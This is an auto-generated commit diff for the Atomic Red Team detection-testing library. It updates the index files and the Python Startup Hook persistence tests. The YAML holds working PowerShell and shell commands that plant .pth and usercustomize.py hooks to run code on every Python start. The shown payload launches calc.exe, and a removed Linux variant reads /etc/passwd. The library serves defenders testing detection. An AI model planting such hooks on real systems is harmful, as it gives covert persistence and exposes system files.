Generated docs from job=generate-docs branch=master [ci skip]

README.md

@@ -2,7 +2,7 @@
 
 # Atomic Red Team
 
-![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1767-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
+![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1769-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
 
 
 Atomic Red Team™ is a library of tests mapped to the

atomics/Indexes/Indexes-CSV/index.csv

@@ -927,9 +927,11 @@ privilege-escalation,T1574.009,Hijack Execution Flow: Path Interception by Unquo
 privilege-escalation,T1037.005,Boot or Logon Initialization Scripts: Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
 privilege-escalation,T1037.005,Boot or Logon Initialization Scripts: Startup Items,2,Add launch script to launch daemon,fc369906-90c7-4a15-86fd-d37da624dde6,bash
 privilege-escalation,T1037.005,Boot or Logon Initialization Scripts: Startup Items,3,Add launch script to launch agent,10cf5bec-49dd-4ebf-8077-8f47e420096f,bash
-privilege-escalation,T1546.018,Event Triggered Execution: Python Startup Hooks,1,Python Startup Hook Execution via .pth (Windows),b4773c6b-3aa0-44a2-830a-b6ff594a0fb2,powershell
-privilege-escalation,T1546.018,Event Triggered Execution: Python Startup Hooks,2,Python Startup Hook Execution via .pth (Linux),85f21c19-18ef-4450-98d8-05bb7b0e1887,bash
-privilege-escalation,T1546.018,Event Triggered Execution: Python Startup Hooks,3,Python Startup Hook Execution via .pth (macOS),858b4aed-d76f-443d-a801-5454ea56dee0,bash
+privilege-escalation,T1546.018,Event Triggered Execution: Python Startup Hooks,1,Python Startup Hook - atomic_hook.pth (Windows),57289962-21dc-4501-b756-80cd30608d9f,powershell
+privilege-escalation,T1546.018,Event Triggered Execution: Python Startup Hooks,2,Python Startup Hook - usercustomize.py (Windows),05cc7a2c-ce32-46f2-a358-f27f76718c39,powershell
+privilege-escalation,T1546.018,Event Triggered Execution: Python Startup Hooks,3,Python Startup Hook - atomic_hook.pth (Linux),a58c066d-f2f0-42a2-ab70-30af73f89e66,sh
+privilege-escalation,T1546.018,Event Triggered Execution: Python Startup Hooks,4,Python Startup Hook - atomic_hook.pth (macOS),28ca4f81-fa96-47ff-8555-dde98017e89b,sh
+privilege-escalation,T1546.018,Event Triggered Execution: Python Startup Hooks,5,Python Startup Hook - usercustomize.py (Linux / MacOS),6e78084a-a433-4702-a838-cc7b765d87e8,sh
 privilege-escalation,T1546.010,Event Triggered Execution: AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
 privilege-escalation,T1546.002,Event Triggered Execution: Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
 privilege-escalation,T1543.001,Create or Modify System Process: Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash
@@ -1407,9 +1409,11 @@ persistence,T1574.009,Hijack Execution Flow: Path Interception by Unquoted Path,
 persistence,T1037.005,Boot or Logon Initialization Scripts: Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
 persistence,T1037.005,Boot or Logon Initialization Scripts: Startup Items,2,Add launch script to launch daemon,fc369906-90c7-4a15-86fd-d37da624dde6,bash
 persistence,T1037.005,Boot or Logon Initialization Scripts: Startup Items,3,Add launch script to launch agent,10cf5bec-49dd-4ebf-8077-8f47e420096f,bash
-persistence,T1546.018,Event Triggered Execution: Python Startup Hooks,1,Python Startup Hook Execution via .pth (Windows),b4773c6b-3aa0-44a2-830a-b6ff594a0fb2,powershell
-persistence,T1546.018,Event Triggered Execution: Python Startup Hooks,2,Python Startup Hook Execution via .pth (Linux),85f21c19-18ef-4450-98d8-05bb7b0e1887,bash
-persistence,T1546.018,Event Triggered Execution: Python Startup Hooks,3,Python Startup Hook Execution via .pth (macOS),858b4aed-d76f-443d-a801-5454ea56dee0,bash
+persistence,T1546.018,Event Triggered Execution: Python Startup Hooks,1,Python Startup Hook - atomic_hook.pth (Windows),57289962-21dc-4501-b756-80cd30608d9f,powershell
+persistence,T1546.018,Event Triggered Execution: Python Startup Hooks,2,Python Startup Hook - usercustomize.py (Windows),05cc7a2c-ce32-46f2-a358-f27f76718c39,powershell
+persistence,T1546.018,Event Triggered Execution: Python Startup Hooks,3,Python Startup Hook - atomic_hook.pth (Linux),a58c066d-f2f0-42a2-ab70-30af73f89e66,sh
+persistence,T1546.018,Event Triggered Execution: Python Startup Hooks,4,Python Startup Hook - atomic_hook.pth (macOS),28ca4f81-fa96-47ff-8555-dde98017e89b,sh
+persistence,T1546.018,Event Triggered Execution: Python Startup Hooks,5,Python Startup Hook - usercustomize.py (Linux / MacOS),6e78084a-a433-4702-a838-cc7b765d87e8,sh
 persistence,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt
 persistence,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
 persistence,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt

atomics/Indexes/Indexes-CSV/linux-index.csv

@@ -181,7 +181,8 @@ persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc
 persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,5,Append commands user shell profile,bbdb06bc-bab6-4f5b-8232-ba3fbed51d77,sh
 persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,6,System shell profile scripts,8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4,sh
 persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,7,Create/Append to .bash_logout,37ad2f24-7c53-4a50-92da-427a4ad13f58,bash
-persistence,T1546.018,Event Triggered Execution: Python Startup Hooks,2,Python Startup Hook Execution via .pth (Linux),85f21c19-18ef-4450-98d8-05bb7b0e1887,bash
+persistence,T1546.018,Event Triggered Execution: Python Startup Hooks,3,Python Startup Hook - atomic_hook.pth (Linux),a58c066d-f2f0-42a2-ab70-30af73f89e66,sh
+persistence,T1546.018,Event Triggered Execution: Python Startup Hooks,5,Python Startup Hook - usercustomize.py (Linux / MacOS),6e78084a-a433-4702-a838-cc7b765d87e8,sh
 persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
 persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,sh
 persistence,T1543.002,Create or Modify System Process: SysV/Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
@@ -272,7 +273,8 @@ privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc
 privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,5,Append commands user shell profile,bbdb06bc-bab6-4f5b-8232-ba3fbed51d77,sh
 privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,6,System shell profile scripts,8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4,sh
 privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,7,Create/Append to .bash_logout,37ad2f24-7c53-4a50-92da-427a4ad13f58,bash
-privilege-escalation,T1546.018,Event Triggered Execution: Python Startup Hooks,2,Python Startup Hook Execution via .pth (Linux),85f21c19-18ef-4450-98d8-05bb7b0e1887,bash
+privilege-escalation,T1546.018,Event Triggered Execution: Python Startup Hooks,3,Python Startup Hook - atomic_hook.pth (Linux),a58c066d-f2f0-42a2-ab70-30af73f89e66,sh
+privilege-escalation,T1546.018,Event Triggered Execution: Python Startup Hooks,5,Python Startup Hook - usercustomize.py (Linux / MacOS),6e78084a-a433-4702-a838-cc7b765d87e8,sh
 privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
 privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,sh
 privilege-escalation,T1543.002,Create or Modify System Process: SysV/Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash

atomics/Indexes/Indexes-CSV/macos-index.csv

@@ -114,7 +114,8 @@ persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc
 persistence,T1037.005,Boot or Logon Initialization Scripts: Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
 persistence,T1037.005,Boot or Logon Initialization Scripts: Startup Items,2,Add launch script to launch daemon,fc369906-90c7-4a15-86fd-d37da624dde6,bash
 persistence,T1037.005,Boot or Logon Initialization Scripts: Startup Items,3,Add launch script to launch agent,10cf5bec-49dd-4ebf-8077-8f47e420096f,bash
-persistence,T1546.018,Event Triggered Execution: Python Startup Hooks,3,Python Startup Hook Execution via .pth (macOS),858b4aed-d76f-443d-a801-5454ea56dee0,bash
+persistence,T1546.018,Event Triggered Execution: Python Startup Hooks,4,Python Startup Hook - atomic_hook.pth (macOS),28ca4f81-fa96-47ff-8555-dde98017e89b,sh
+persistence,T1546.018,Event Triggered Execution: Python Startup Hooks,5,Python Startup Hook - usercustomize.py (Linux / MacOS),6e78084a-a433-4702-a838-cc7b765d87e8,sh
 persistence,T1543.001,Create or Modify System Process: Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash
 persistence,T1543.001,Create or Modify System Process: Launch Agent,2,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash
 persistence,T1543.001,Create or Modify System Process: Launch Agent,3,Launch Agent - Root Directory,66774fa8-c562-4bae-a58d-5264a0dd9dd7,bash
@@ -182,7 +183,8 @@ privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc
 privilege-escalation,T1037.005,Boot or Logon Initialization Scripts: Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
 privilege-escalation,T1037.005,Boot or Logon Initialization Scripts: Startup Items,2,Add launch script to launch daemon,fc369906-90c7-4a15-86fd-d37da624dde6,bash
 privilege-escalation,T1037.005,Boot or Logon Initialization Scripts: Startup Items,3,Add launch script to launch agent,10cf5bec-49dd-4ebf-8077-8f47e420096f,bash
-privilege-escalation,T1546.018,Event Triggered Execution: Python Startup Hooks,3,Python Startup Hook Execution via .pth (macOS),858b4aed-d76f-443d-a801-5454ea56dee0,bash
+privilege-escalation,T1546.018,Event Triggered Execution: Python Startup Hooks,4,Python Startup Hook - atomic_hook.pth (macOS),28ca4f81-fa96-47ff-8555-dde98017e89b,sh
+privilege-escalation,T1546.018,Event Triggered Execution: Python Startup Hooks,5,Python Startup Hook - usercustomize.py (Linux / MacOS),6e78084a-a433-4702-a838-cc7b765d87e8,sh
 privilege-escalation,T1543.001,Create or Modify System Process: Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash
 privilege-escalation,T1543.001,Create or Modify System Process: Launch Agent,2,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash
 privilege-escalation,T1543.001,Create or Modify System Process: Launch Agent,3,Launch Agent - Root Directory,66774fa8-c562-4bae-a58d-5264a0dd9dd7,bash

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -649,7 +649,8 @@ privilege-escalation,T1546.015,Event Triggered Execution: Component Object Model
 privilege-escalation,T1546.015,Event Triggered Execution: Component Object Model Hijacking,3,COM Hijacking with RunDLL32 (Local Server Switch),123520cc-e998-471b-a920-bd28e3feafa0,powershell
 privilege-escalation,T1546.015,Event Triggered Execution: Component Object Model Hijacking,4,COM hijacking via TreatAs,33eacead-f117-4863-8eb0-5c6304fbfaa9,powershell
 privilege-escalation,T1574.009,Hijack Execution Flow: Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
-privilege-escalation,T1546.018,Event Triggered Execution: Python Startup Hooks,1,Python Startup Hook Execution via .pth (Windows),b4773c6b-3aa0-44a2-830a-b6ff594a0fb2,powershell
+privilege-escalation,T1546.018,Event Triggered Execution: Python Startup Hooks,1,Python Startup Hook - atomic_hook.pth (Windows),57289962-21dc-4501-b756-80cd30608d9f,powershell
+privilege-escalation,T1546.018,Event Triggered Execution: Python Startup Hooks,2,Python Startup Hook - usercustomize.py (Windows),05cc7a2c-ce32-46f2-a358-f27f76718c39,powershell
 privilege-escalation,T1546.010,Event Triggered Execution: AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
 privilege-escalation,T1546.002,Event Triggered Execution: Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
 privilege-escalation,T1037.001,Boot or Logon Initialization Scripts: Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
@@ -996,7 +997,8 @@ persistence,T1546.015,Event Triggered Execution: Component Object Model Hijackin
 persistence,T1546.015,Event Triggered Execution: Component Object Model Hijacking,4,COM hijacking via TreatAs,33eacead-f117-4863-8eb0-5c6304fbfaa9,powershell
 persistence,T1137.004,Office Application Startup: Outlook Home Page,1,Install Outlook Home Page Persistence,7a91ad51-e6d2-4d43-9471-f26362f5738e,command_prompt
 persistence,T1574.009,Hijack Execution Flow: Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
-persistence,T1546.018,Event Triggered Execution: Python Startup Hooks,1,Python Startup Hook Execution via .pth (Windows),b4773c6b-3aa0-44a2-830a-b6ff594a0fb2,powershell
+persistence,T1546.018,Event Triggered Execution: Python Startup Hooks,1,Python Startup Hook - atomic_hook.pth (Windows),57289962-21dc-4501-b756-80cd30608d9f,powershell
+persistence,T1546.018,Event Triggered Execution: Python Startup Hooks,2,Python Startup Hook - usercustomize.py (Windows),05cc7a2c-ce32-46f2-a358-f27f76718c39,powershell
 persistence,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt
 persistence,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
 persistence,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt

atomics/Indexes/Indexes-Markdown/index.md

@@ -1227,9 +1227,11 @@
   - Atomic Test #3: Add launch script to launch agent [macos]
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.018 Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md)
-  - Atomic Test #1: Python Startup Hook Execution via .pth (Windows) [windows]
-  - Atomic Test #2: Python Startup Hook Execution via .pth (Linux) [linux]
-  - Atomic Test #3: Python Startup Hook Execution via .pth (macOS) [macos]
+  - Atomic Test #1: Python Startup Hook - atomic_hook.pth (Windows) [windows]
+  - Atomic Test #2: Python Startup Hook - usercustomize.py (Windows) [windows]
+  - Atomic Test #3: Python Startup Hook - atomic_hook.pth (Linux) [linux]
+  - Atomic Test #4: Python Startup Hook - atomic_hook.pth (macOS) [macos]
+  - Atomic Test #5: Python Startup Hook - usercustomize.py (Linux / MacOS) [linux, macos]
 - T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.010 Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md)
   - Atomic Test #1: Install AppInit Shim [windows]
@@ -1878,9 +1880,11 @@
 - T1671 Cloud Application Integration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.018 Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md)
-  - Atomic Test #1: Python Startup Hook Execution via .pth (Windows) [windows]
-  - Atomic Test #2: Python Startup Hook Execution via .pth (Linux) [linux]
-  - Atomic Test #3: Python Startup Hook Execution via .pth (macOS) [macos]
+  - Atomic Test #1: Python Startup Hook - atomic_hook.pth (Windows) [windows]
+  - Atomic Test #2: Python Startup Hook - usercustomize.py (Windows) [windows]
+  - Atomic Test #3: Python Startup Hook - atomic_hook.pth (Linux) [linux]
+  - Atomic Test #4: Python Startup Hook - atomic_hook.pth (macOS) [macos]
+  - Atomic Test #5: Python Startup Hook - usercustomize.py (Linux / MacOS) [linux, macos]
 - T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1197 BITS Jobs](../../T1197/T1197.md)
   - Atomic Test #1: Bitsadmin Download (cmd) [windows]

atomics/Indexes/Indexes-Markdown/linux-index.md

@@ -327,7 +327,8 @@
 - T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.018 Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md)
-  - Atomic Test #2: Python Startup Hook Execution via .pth (Linux) [linux]
+  - Atomic Test #3: Python Startup Hook - atomic_hook.pth (Linux) [linux]
+  - Atomic Test #5: Python Startup Hook - usercustomize.py (Linux / MacOS) [linux, macos]
 - T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -466,7 +467,8 @@
 - T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.018 Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md)
-  - Atomic Test #2: Python Startup Hook Execution via .pth (Linux) [linux]
+  - Atomic Test #3: Python Startup Hook - atomic_hook.pth (Linux) [linux]
+  - Atomic Test #5: Python Startup Hook - usercustomize.py (Linux / MacOS) [linux, macos]
 - T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1197 BITS Jobs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/macos-index.md

@@ -285,7 +285,8 @@
 - T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.018 Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md)
-  - Atomic Test #3: Python Startup Hook Execution via .pth (macOS) [macos]
+  - Atomic Test #4: Python Startup Hook - atomic_hook.pth (macOS) [macos]
+  - Atomic Test #5: Python Startup Hook - usercustomize.py (Linux / MacOS) [linux, macos]
 - T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -413,7 +414,8 @@
 - T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.018 Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md)
-  - Atomic Test #3: Python Startup Hook Execution via .pth (macOS) [macos]
+  - Atomic Test #4: Python Startup Hook - atomic_hook.pth (macOS) [macos]
+  - Atomic Test #5: Python Startup Hook - usercustomize.py (Linux / MacOS) [linux, macos]
 - T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1197 BITS Jobs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -876,7 +876,8 @@
   - Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.018 Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md)
-  - Atomic Test #1: Python Startup Hook Execution via .pth (Windows) [windows]
+  - Atomic Test #1: Python Startup Hook - atomic_hook.pth (Windows) [windows]
+  - Atomic Test #2: Python Startup Hook - usercustomize.py (Windows) [windows]
 - T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.010 Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md)
   - Atomic Test #1: Install AppInit Shim [windows]
@@ -1340,7 +1341,8 @@
   - Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.018 Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md)
-  - Atomic Test #1: Python Startup Hook Execution via .pth (Windows) [windows]
+  - Atomic Test #1: Python Startup Hook - atomic_hook.pth (Windows) [windows]
+  - Atomic Test #2: Python Startup Hook - usercustomize.py (Windows) [windows]
 - T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1197 BITS Jobs](../../T1197/T1197.md)
   - Atomic Test #1: Bitsadmin Download (cmd) [windows]

atomics/Indexes/index.yaml

@@ -46313,91 +46313,145 @@ privilege-escalation:
       x_mitre_version: '1.0'
       identifier: T1546.018
     atomic_tests:
-    - name: Python Startup Hook Execution via .pth (Windows)
-      auto_generated_guid: b4773c6b-3aa0-44a2-830a-b6ff594a0fb2
-      description: 'Creates a Python startup hook using a .pth file inside a virtual
-        environment on Windows.
-
-        '
+    - name: Python Startup Hook - atomic_hook.pth (Windows)
+      auto_generated_guid: 57289962-21dc-4501-b756-80cd30608d9f
+      description: "Executes code by placing a .pth file in the site-packages directory.
+        \nSupports python.exe and python3.exe via input arguments.\n"
       supported_platforms:
       - windows
       input_arguments:
-        exe_name:
-          description: Executable to launch
-          type: string
-          default: calc.exe
-        python_path:
-          description: Path to Python interpreter
-          type: path
+        python_exe:
+          description: The python binary name to test.
+          type: String
           default: python.exe
       dependency_executor_name: powershell
       dependencies:
-      - description: Ensure Python is installed
-        prereq_command: 'if (Get-Command #{python_path} -ErrorAction SilentlyContinue)
-          { exit 0 } else { exit 1 }
+      - description: 'Python must be installed and the specified binary (#{python_exe})
+          must be in the PATH.
 
           '
-        get_prereq_command: 'Write-Host "Python not found. Please install it from
-          https://www.python.org/downloads/windows/ or via ''winget install Python.Python.3''"
+        prereq_command: 'if (Get-Command @("#{python_exe}", ''python3.exe'') -ErrorAction
+          SilentlyContinue) { exit 0 } else { exit 1 }
+
+          '
+        get_prereq_command: 'Write-Host "[!] Python3 not found. Please install Python3
+          (e.g., winget install python3 or winget install python or https://www.python.org/downloads/windows/)
+          or ensure it is in your PATH."
 
           '
       executor:
         name: powershell
         elevation_required: false
         command: |
-          $TempDir = Join-Path $env:TEMP ("atomic_python_hook_" + [guid]::NewGuid())
-          New-Item -ItemType Directory -Path $TempDir | Out-Null
-          Set-Location $TempDir
-          Set-Content -Path "$env:TEMP\atomic_python_hook_path.txt" -Value $TempDir
-          & "#{python_path}" -m venv env
+          $TempDir = Join-Path $env:TEMP "atomic_pth_win"
+          New-Item -ItemType Directory -Path $TempDir -Force
+          & "#{python_exe}" -m venv "$TempDir\env"
           $SitePackages = & "$TempDir\env\Scripts\python.exe" -c "import site; print(site.getsitepackages()[1])"
-          "import os, subprocess; os.environ.get('CALC_SPAWNED') or (os.environ.update({'CALC_SPAWNED':'1'}) or subprocess.Popen(['#{exe_name}']))" | Out-File -Encoding ASCII "$SitePackages\atomic_hook.pth"
-          & "$TempDir\env\Scripts\python.exe" -c "print('Interpreter started')"
+          "import os, subprocess; os.environ.get('CALC_SPAWNED') or (os.environ.update({'CALC_SPAWNED':'1'}) or subprocess.Popen(['calc.exe']))" | Out-File -Encoding ASCII "$SitePackages\atomic_hook.pth"
+          Get-ChildItem -Path "$SitePackages" | Where-Object { $_.Name -like "*.pth" }
+          & "$TempDir\env\Scripts\python.exe" -c "print('Triggering Hook via atomic_hook...')"
         cleanup_command: |
-          Get-Process CalculatorApp -ErrorAction SilentlyContinue | Stop-Process -Force
-          if (Test-Path "$env:TEMP\atomic_python_hook_path.txt") {
-            $TempDir = Get-Content "$env:TEMP\atomic_python_hook_path.txt"
-            Remove-Item -Recurse -Force $TempDir -ErrorAction SilentlyContinue
-            Remove-Item "$env:TEMP\atomic_python_hook_path.txt" -Force }
-    - name: Python Startup Hook Execution via .pth (Linux)
-      auto_generated_guid: 85f21c19-18ef-4450-98d8-05bb7b0e1887
-      description: 'Creates a Python startup hook using a .pth file inside a virtual
-        environment on Linux.
-
-        '
+          if (-not (Get-ChildItem -Path $env:TEMP -ErrorAction SilentlyContinue | Where-Object Name -like 'atomic_pth_win')) { Write-Host "[!] Artifact missing: $env:Temp\atomic_pth_win Folder - [-] Please Run : Invoke-AtomicTest T1546.018"; exit 1 };
+          Remove-Item -Path "$env:TEMP\atomic_pth_win" -Recurse -Force
+          Write-Host "[+] Successfully Removed atomic_pth_win folder and atomic_hook.pth from Temp Directory"
+          Get-Process -Name "Calc*" -ErrorAction SilentlyContinue | Stop-Process -Force
+          Get-Process -Name "calc*" -ErrorAction SilentlyContinue | Stop-Process -Force
+          Write-Host "[+] Successfully Terminated Calculator"
+    - name: Python Startup Hook - usercustomize.py (Windows)
+      auto_generated_guid: 05cc7a2c-ce32-46f2-a358-f27f76718c39
+      description: "Executes code via usercustomize.py. This is a per-user persistence
+        mechanism \nthat does not require Administrative privileges.\n"
       supported_platforms:
-      - linux
+      - windows
       input_arguments:
-        python_path:
-          description: Path to Python interpreter
-          type: path
-          default: python3
-      dependency_executor_name: bash
+        python_exe:
+          description: The python binary name to test
+          type: String
+          default: python.exe
+      dependency_executor_name: powershell
       dependencies:
-      - description: Ensure Python is installed
-        prereq_command: command -v
-        get_prereq_command: 'echo "Python3 not found. Please install it using your
-          package manager (e.g., ''sudo apt install python3'' or ''sudo yum install
-          python3'')."
+      - description: 'Python must be installed and the specified binary (#{python_exe})
+          must be in the PATH.
+
+          '
+        prereq_command: 'if (Get-Command @("#{python_exe}", ''python3.exe'') -ErrorAction
+          SilentlyContinue) { exit 0 } else { exit 1 }
+
+          '
+        get_prereq_command: 'Write-Host "[!] Python3 not found. Please install Python3
+          (e.g., winget install python3 or winget install python or https://www.python.org/downloads/windows/)
+          or ensure it is in your PATH."
 
           '
       executor:
-        name: bash
+        name: powershell
         elevation_required: false
         command: |
-          PYTHON_EXE=$(command -v #{python_path})
-          TEMPDIR=$(mktemp -d /tmp/atomic_python_hook_XXXXXX)
-          echo "$TEMPDIR" > /tmp/atomic_python_hook_path.txt
-          $PYTHON_EXE -m venv "$TEMPDIR/env"
-          SITE_PACKAGES=$("$TEMPDIR/env/bin/python" -c "import site; print(site.getsitepackages()[0])")
-          echo "import sys, os; (not hasattr(sys, 'hook_run')) and (setattr(sys, 'hook_run', True) or os.system('cat /etc/passwd'))" > "$SITE_PACKAGES/atomic_hook.pth"
-          "$TEMPDIR/env/bin/python" -c "print('Interpreter started')"
-        cleanup_command: 'rm -rf $(cat /tmp/atomic_python_hook_path.txt) && rm -f
-          /tmp/atomic_python_hook_path.txt
+          $UserDir = & "#{python_exe}" -c "import site; print(site.getusersitepackages())"
+          if (!(Test-Path $UserDir)) { New-Item -ItemType Directory -Path $UserDir -Force }
+          "import os; os.system('calc.exe')" | Out-File -FilePath "$UserDir\usercustomize.py" -Encoding ASCII
+          Get-ChildItem -Path "$UserDir"
+          & "#{python_exe}" -c "print('Triggering Hook via usercustomize...')"
